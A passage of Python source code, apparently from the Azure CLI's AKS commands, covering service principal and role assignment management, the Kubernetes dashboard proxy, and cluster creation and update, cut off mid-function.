from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def aks_browse(cmd, # pylint: disable=too-many-statements
client,
resource_group_name,
name,
disable_browser=False,
listen_address='127.0.0.1',
listen_port='8001'):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
addon_profile = addon_profiles.get("kubeDashboard", ManagedClusterAddonProfile(enabled=True))
if not addon_profile.enabled:
raise CLIError('The kube-dashboard addon was disabled for this managed cluster.\n'
'To use "az aks browse" first enable the add-on\n'
'by running "az aks enable-addons --addons kube-dashboard".')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning('To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
if err.output.find(b'unknown flag: --address'):
if listen_address != '127.0.0.1':
logger.warning('"--address" is only supported in kubectl v1.13 and later.')
logger.warning('The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
('omsagent' in result.addon_profiles) and
(hasattr(result.addon_profiles['omsagent'], 'identity')) and
(hasattr(result.addon_profiles['omsagent'].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles['omsagent'].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
def aks_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
min_count=None,
max_count=None,
vnet_subnet_id=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
enable_managed_identity=False,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_shared=None,
appgw_watch_namespace=None,
no_wait=False):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# Flag to be removed, kept for back-compatibility only. Remove the below section
# when we deprecate the enable-vmss flag
if enable_vmss:
if vm_set_type and vm_set_type.lower() != "VirtualMachineScaleSets".lower():
raise CLIError('enable-vmss and provided vm_set_type ({}) are conflicting with each other'.
format(vm_set_type))
vm_set_type = "VirtualMachineScaleSets"
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
mode="System",
vnet_subnet_id=vnet_subnet_id,
availability_zones=node_zones,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username:
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password)
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"))
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
else:
# Attach acr operation will be handled after the cluster is created
pass
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
scope = vnet_subnet_id
if not _add_role_assignment(
cmd.cli_ctx,
'Network Contributor',
service_principal_profile.client_id,
scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
outbound_type = _set_outbound_type(outbound_type, network_plugin, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin,
pod_cidr,
service_cidr,
dns_service_ip,
docker_bridge_address,
network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id,
appgw_name,
appgw_subnet_prefix,
appgw_id,
appgw_subnet_id,
appgw_shared,
appgw_watch_namespace
)
monitoring = False
if 'omsagent' in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
if CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles:
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config:
appgw_id = addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
from msrestazure.tools import parse_resource_id, resource_id
appgw_id_dict = parse_resource_id(appgw_id)
appgw_group_id = resource_id(
subscription=appgw_id_dict["subscription"],
resource_group=appgw_id_dict["resource_group"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_profile.client_id, scope=appgw_group_id):
logger.warning('Could not create a role assignment for application gateway: {appgw_id} '
'specified in {CONST_INGRESS_APPGW_ADDON_NAME} addon. '
'Are you an Owner on this subscription?')
if CONST_INGRESS_APPGW_SUBNET_ID in addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config:
subnet_id = addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config[CONST_INGRESS_APPGW_SUBNET_ID]
from msrestazure.tools import parse_resource_id, resource_id
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_profile.client_id, scope=subnet_id):
logger.warning('Could not create a role assignment for subnet: {subnet_id} '
'specified in {CONST_INGRESS_APPGW_ADDON_NAME} addon. '
'Are you an Owner on this subscription?')
aad_profile = None
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
api_server_access_profile = None
if api_server_authorized_ip_ranges:
api_server_access_profile = _populate_api_server_access_profile(api_server_authorized_ip_ranges)
identity = None
if enable_managed_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
enable_rbac = True
if disable_rbac:
enable_rbac = False
mc = ManagedCluster(
location=location, tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=enable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
enable_pod_security_policy=bool(enable_pod_security_policy),
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id,
api_server_access_profile=api_server_access_profile)
if node_resource_group:
mc.node_resource_group = node_resource_group
if enable_private_cluster:
if load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
mc.api_server_access_profile = ManagedClusterAPIServerAccessProfile(
enable_private_cluster=True
)
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('custom headers format is incorrect')
headers[parts[0]] = parts[1]
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
logger.info('AKS cluster is creating, please wait...')
if monitoring:
# adding a wait here since we rely on the result for role assignment
created_cluster = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(created_cluster, cluster_resource_id, cmd)
else:
created_cluster = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=headers).result()
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if created_cluster.identity_profile is None or \
created_cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach acr to it, '
'you can manually grant permission to the identity named <ClUSTER_NAME>-agentpool '
'in MC_ resource group to give it permission to pull from ACR.')
else:
kubelet_identity_client_id = created_cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
return created_cluster
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None):
update_autoscaler = enable_cluster_autoscaler or disable_cluster_autoscaler or update_cluster_autoscaler
update_acr = attach_acr is not None or detach_acr is not None
update_pod_security = enable_pod_security_policy or disable_pod_security_policy
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
# pylint: disable=too-many-boolean-expressions
if not update_autoscaler and \
cluster_autoscaler_profile is None and \
not update_acr and \
not update_lb_profile \
and api_server_authorized_ip_ranges is None and \
not update_pod_security and \
not update_lb_profile:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--cluster-autoscaler-profile" or '
'"--enable-pod-security-policy" or '
'"--disable-pod-security-policy" or '
'"--api-server-authorized-ip-ranges" or '
'"--attach-acr" or '
'"--detach-acr" or '
'"--load-balancer-managed-outbound-ip-count" or '
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes"')
instance = client.get(resource_group_name, name)
if update_autoscaler and len(instance.agent_pool_profiles) > 1:
raise CLIError('There is more than one node pool in the cluster. Please use "az aks nodepool" command '
'to update per node pool auto scaler settings')
node_count = instance.agent_pool_profiles[0].count
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specifying both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count.')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError("current node count '{}' is not in the range of min-count and max-count.".format(node_count))
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this managed cluster.\n'
'Please run "az aks update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this managed cluster.\n'
'Run "az aks update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already disabled for this managed cluster.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
if not cluster_autoscaler_profile:
instance.auto_scaler_profile = {}
else:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
if enable_pod_security_policy and disable_pod_security_policy:
raise CLIError('Cannot specify --enable-pod-security-policy and --disable-pod-security-policy '
'at the same time.')
if enable_pod_security_policy:
instance.enable_pod_security_policy = True
if disable_pod_security_policy:
instance.enable_pod_security_policy = False
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
if attach_acr and detach_acr:
raise CLIError('Cannot specify "--attach-acr" and "--detach-acr" at the same time.')
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if instance.identity is not None and instance.identity.type == "SystemAssigned":
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
'<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(api_server_authorized_ip_ranges, instance)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
if user.lower() == 'clusteruser':
